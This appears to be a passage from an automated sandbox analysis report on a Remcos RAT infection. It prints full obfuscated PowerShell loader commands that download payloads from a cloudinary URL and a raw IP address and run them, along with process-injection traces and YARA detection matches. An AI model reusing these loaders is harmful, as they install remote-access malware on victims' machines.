=='+[CHaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispiculeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 49%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00417245
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,12_2_0041ACC1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,12_2_0041ACED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004016FD NtdllDefWindowProc_A,15_2_004016FD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004017B7 NtdllDefWindowProc_A,15_2_004017B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00402CAC NtdllDefWindowProc_A,16_2_00402CAC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00402D66 NtdllDefWindowProc_A,16_2_00402D66
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04EA14B33_2_04EA14B3
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_045A7FED7_2_045A7FED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D07112_2_0041D071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004520D212_2_004520D2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D09812_2_0043D098
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043715012_2_00437150
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004361AA12_2_004361AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042625412_2_00426254
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043137712_2_00431377
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043651C12_2_0043651C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E5DF12_2_0041E5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044C73912_2_0044C739
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004367C612_2_004367C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004267CB12_2_004267CB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043C9DD12_2_0043C9DD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432A4912_2_00432A49
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436A8D12_2_00436A8D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CC0C12_2_0043CC0C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436D4812_2_00436D48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434D2212_2_00434D22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426E7312_2_00426E73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00440E2012_2_00440E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CE3B12_2_0043CE3B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00412F4512_2_00412F45
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00452F0012_2_00452F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426FAD12_2_00426FAD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1001719412_2_10017194
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000B5C112_2_1000B5C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044B04013_2_0044B040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043610D13_2_0043610D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044731013_2_00447310
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044A49013_2_0044A490
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040755A13_2_0040755A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043C56013_2_0043C560
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044B61013_2_0044B610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044D6C013_2_0044D6C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004476F013_2_004476F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044B87013_2_0044B870
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044081D13_2_0044081D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041495713_2_00414957
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004079EE13_2_004079EE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00407AEB13_2_00407AEB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044AA8013_2_0044AA80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00412AA913_2_00412AA9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404B7413_2_00404B74
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404B0313_2_00404B03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044BBD813_2_0044BBD8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404BE513_2_00404BE5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404C7613_2_00404C76
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00415CFE13_2_00415CFE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00416D7213_2_00416D72
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00446D3013_2_00446D30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00446D8B13_2_00446D8B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406E8F13_2_00406E8F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040503815_2_00405038
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0041208C15_2_0041208C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004050A915_2_004050A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040511A15_2_0040511A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0043C13A15_2_0043C13A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004051AB15_2_004051AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0044930015_2_00449300
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0040D32215_2_0040D322
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0044A4F015_2_0044A4F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0043A5AB15_2_0043A5AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0041363115_2_00413631
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0044669015_2_00446690
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0044A73015_2_0044A730
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004398D815_2_004398D8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004498E015_2_004498E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0044A88615_2_0044A886
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0043DA0915_2_0043DA09
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00438D5E15_2_00438D5E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00449ED015_2_00449ED0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0041FE8315_2_0041FE83
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00430F5415_2_00430F54
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_004050C216_2_004050C2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_004014AB16_2_004014AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_0040513316_2_00405133
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_004051A416_2_004051A4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_0040124616_2_00401246
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_0040CA4616_2_0040CA46
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_0040523516_2_00405235
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_004032C816_2_004032C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_0040168916_2_00401689
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00402F6016_2_00402F60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 40 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2041
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2008
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2041Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2008Jump to behavior
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
